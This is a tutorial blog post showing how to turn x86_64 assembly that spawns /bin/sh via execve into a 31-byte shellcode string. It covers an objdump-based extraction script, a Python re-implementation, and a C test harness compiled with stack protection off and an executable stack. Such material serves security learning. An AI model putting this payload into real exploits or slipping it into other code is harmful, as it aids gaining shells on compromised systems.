
Converting assembly to shellcode

2017-09-28 16:04 232 views
The assembly code is as follows:

section .text
global _start
_start:
jmp shell            ; jump forward to the call so the string address ends up on the stack
here:
xor rax,rax          ; rax = 0
pop rdi              ; rdi = return address pushed by call = address of "/bin//sh"
xor rsi,rsi          ; rsi = 0 (argv = NULL)
xor rdx,rdx          ; rdx = 0 (envp = NULL)
add rax,59           ; rax = 59, the x86_64 execve syscall number
syscall
shell:
call here            ; pushes the address of the bytes that follow, then jumps back to here
bash db "/bin//sh"   ; execve path; the doubled slash makes it exactly 8 bytes


The build and run steps were as follows:

jay@ubuntu:~/Desktop/bin2shell$ vim shell.asm
jay@ubuntu:~/Desktop/bin2shell$ nasm -f elf64 shell.asm -o shell.o
jay@ubuntu:~/Desktop/bin2shell$ ld shell.o -o shell
jay@ubuntu:~/Desktop/bin2shell$ ./shell
$ ls
README.md  bin2shell.sh  shell  shell.asm  shell.o
$ exit


Use the following bin2shell.sh script to convert the binary shell program into x86_64 shellcode:

#!/bin/bash
# Emit every instruction byte of the disassembly of $1 as a \xNN escape on a single line:
# objdump -d prints instruction lines with a leading space, and the second tab-separated field holds the hex bytes.
for i in $(objdump -d "$1" | grep "^ " | cut -f2); do echo -n '\x'"$i"; done; echo


How it works: after objdump -d, take the second (tab-separated) field of every instruction line, that is, every line that begins with a space, which holds the instruction bytes; prefix each byte with "\x" and echo the result. The "/bin//sh" string at <bash> is shown as meaningless instructions ((bad), outsb, jae) because objdump disassembles everything in .text as code, but the script reads only the byte column, so those bytes are extracted unchanged.

jay@ubuntu:~/Desktop/bin2shell$ objdump -d shell

shell:     file format elf64-x86-64

Disassembly of section .text:

0000000000400080 <_start>:
400080:   eb 10                   jmp    400092 <shell>

0000000000400082 <here>:
400082:   48 31 c0                xor    %rax,%rax
400085:   5f                      pop    %rdi
400086:   48 31 f6                xor    %rsi,%rsi
400089:   48 31 d2                xor    %rdx,%rdx
40008c:   48 83 c0 3b             add    $0x3b,%rax
400090:   0f 05                   syscall

0000000000400092 <shell>:
400092:   e8 eb ff ff ff          callq  400082 <here>

0000000000400097 <bash>:
400097:   2f                      (bad)
400098:   62                      (bad)
400099:   69                      .byte 0x69
40009a:   6e                      outsb  %ds:(%rsi),(%dx)
40009b:   2f                      (bad)
40009c:   2f                      (bad)
40009d:   73 68                   jae    400107 <bash+0x70>


The final result is as follows:

jay@ubuntu:~/Desktop/bin2shell$ ./bin2shell.sh  shell
\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68

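As an added example (not part of the original post or the linked repository), the same extraction done in Python over the objdump listing shown above, embedded here as a constructed string so it runs offline; it also reports the length that the C harness's strlen() would print, which stops at the first 0x00 byte. The regex and function names are my own.

```python
import re

# Constructed sample: the objdump -d listing of the page's shell binary, with the
# tab-separated columns exactly as objdump prints them (address, bytes, mnemonic).
OBJDUMP_LISTING = (
    "0000000000400080 <_start>:\n"
    "  400080:\teb 10                \tjmp    400092 <shell>\n"
    "\n0000000000400082 <here>:\n"
    "  400082:\t48 31 c0             \txor    %rax,%rax\n"
    "  400085:\t5f                   \tpop    %rdi\n"
    "  400086:\t48 31 f6             \txor    %rsi,%rsi\n"
    "  400089:\t48 31 d2             \txor    %rdx,%rdx\n"
    "  40008c:\t48 83 c0 3b          \tadd    $0x3b,%rax\n"
    "  400090:\t0f 05                \tsyscall\n"
    "\n0000000000400092 <shell>:\n"
    "  400092:\te8 eb ff ff ff       \tcallq  400082 <here>\n"
    "\n0000000000400097 <bash>:\n"
    "  400097:\t2f                   \t(bad)\n"
    "  400098:\t62                   \t(bad)\n"
    "  400099:\t69                   \t.byte 0x69\n"
    "  40009a:\t6e                   \toutsb  %ds:(%rsi),(%dx)\n"
    "  40009b:\t2f                   \t(bad)\n"
    "  40009c:\t2f                   \t(bad)\n"
    "  40009d:\t73 68                \tjae    400107 <bash+0x70>\n"
)

# An instruction line: indent, hex address, colon, tab, then the byte column
# (pairs separated by single spaces). The mnemonic is not required, so the
# continuation lines objdump prints for instructions longer than 7 bytes also match.
LINE_RE = re.compile(r"^\s+[0-9a-f]+:\t([0-9a-f]{2}(?: [0-9a-f]{2})*)")


def extract_bytes(listing: str) -> bytes:
    """Collect the raw bytes of every instruction line, as bin2shell.sh does."""
    out = bytearray()
    for line in listing.splitlines():
        m = LINE_RE.match(line)
        if m:
            out.extend(bytes.fromhex(m.group(1).replace(" ", "")))
    return bytes(out)


def to_c_escapes(data: bytes) -> str:
    """Format the bytes as the \\xNN string that goes into the C array."""
    return "".join(f"\\x{b:02x}" for b in data)


def strlen_length(data: bytes) -> int:
    """The length the C harness prints: strlen() stops at the first 0x00 byte."""
    nul = data.find(b"\x00")
    return len(data) if nul < 0 else nul
```

Running `to_c_escapes(extract_bytes(OBJDUMP_LISTING))` reproduces the 31-byte string printed by bin2shell.sh above.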

Finally, the C code that runs the shellcode (the compile command is given as a comment on the first line):

# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing

#include <stdio.h>
#include <string.h>

unsigned char code[] = "\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";

int main(void)
{
    printf("Shellcode Length:  %d\n", (int)strlen((const char *)code));

    /* Declare a function pointer, cast the address of the code array to that type, and assign it. */
    int (*ret)(void) = (int (*)(void))code;

    ret();

    return 0;
}


Code: https://github.com/tangsilian/SomeCode/tree/master/bin2shellcode

References:

https://www.exploit-db.com/exploits/42791/

cut command reference: https://www.ibm.com/support/knowledgecenter/zh/ssw_aix_72/com.ibm.aix.cmds1/cut.htm